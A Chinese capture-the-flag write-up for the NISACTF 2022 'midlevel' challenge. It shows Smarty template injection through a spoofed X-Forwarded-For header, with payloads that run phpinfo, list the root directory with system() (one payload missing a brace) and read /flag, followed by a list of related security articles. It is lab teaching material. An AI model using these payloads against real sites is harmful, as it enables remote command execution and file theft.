[NISACTF 2022]midlevel

妙尽璇机2024-01-05 14:54

[NISACTF 2022]midlevel wp

信息搜集

进入页面,右上角显示了我的真实 IP :

最下面提示:Build With Smarty ! :

Smarty 是 PHP 的模板引擎,判断为 Smarty 模板注入。

Smarty 模板注入

推荐博客:Smarty模板注入&CVE-2017-1000480

抓包,添加 XFF 头为 127.0.0.1,测试回显:

成功回显。

if 语句命令执行

if 语句内可以执行任意 PHP 代码,不要加分号。

复制代码 
{if phpinfo()}{/if}

返回结果:

查看根目录下所有文件:

复制代码 
if system('ls /')}{/if}

返回结果:

发现 flag 。

读取 flag 文件:

复制代码 
{if show_source('/flag')}{/if}

返回结果:

拿到 flag 。

相关推荐
Chengbei114 分钟前
OneScan二开升级,bypass防重放递归目录扫描+指纹识别Burp插件
安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
wanhengidc20 分钟前
物理服务器的功能都有哪些
运维·服务器·网络·安全·web安全·智能手机
m0_738120721 小时前
网络安全编程——Python编写Python编写基于UDP的主机发现工具(完结:解码ICMP头)
python·网络协议·安全·web安全·udp
知白守黑V1 小时前
从源码看 Flocks:一个 AI 原生 SecOps 平台应该长什么样
python·web安全·安全威胁分析·数据安全·安全运营·ai安全·flocks
曼岛_2 小时前
[网络安全] Linux权限维持-隐藏篇
linux·安全·web安全·安全威胁分析
视觉&物联智能3 小时前
【杂谈】-筑牢企业防线:抵御恶意人工智能代理的攻击
人工智能·网络安全·ai·企业安全·agi
JS_SWKJ3 小时前
攻防升级下,网闸与光闸的创新突围——2026年网络安全隔离行业新趋势及产品实践
网络·安全·web安全
亚马逊云开发者3 小时前
Claude Mythos Preview 来了:Anthropic 网络安全专用大模型在 Amazon Bedrock 上开放申请,代码审计要变天了
安全·web安全·状态模式
数字哨兵(和中)3 小时前
9.8 分高危漏洞复现:CVE-2026-27944 Nginx UI 信息泄露漏洞
安全·web安全
C2H5OH14 小时前
PortSwigger SQL注入LAB2
网络安全
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点032026 年 AI 编程助手全面对比评测:Cursor vs Copilot vs Claude Code vs GitHub Copilot Free04一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛05GPT-6发布日深度解析-Symphony架构200万Token实战06AI Weekly | 2026年4月第二周 · GitHub热门项目与AI发展趋势深度解析07基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南08GPT-6核心能力解析及与现有主流大模型对比09从限购到畅通:GLM-5.1 Coding Plan接入攻略10零成本!Ollama本地部署国产大模型全指南(支持Kimi-K2.5/GLM-5/Qwen,新手秒上手)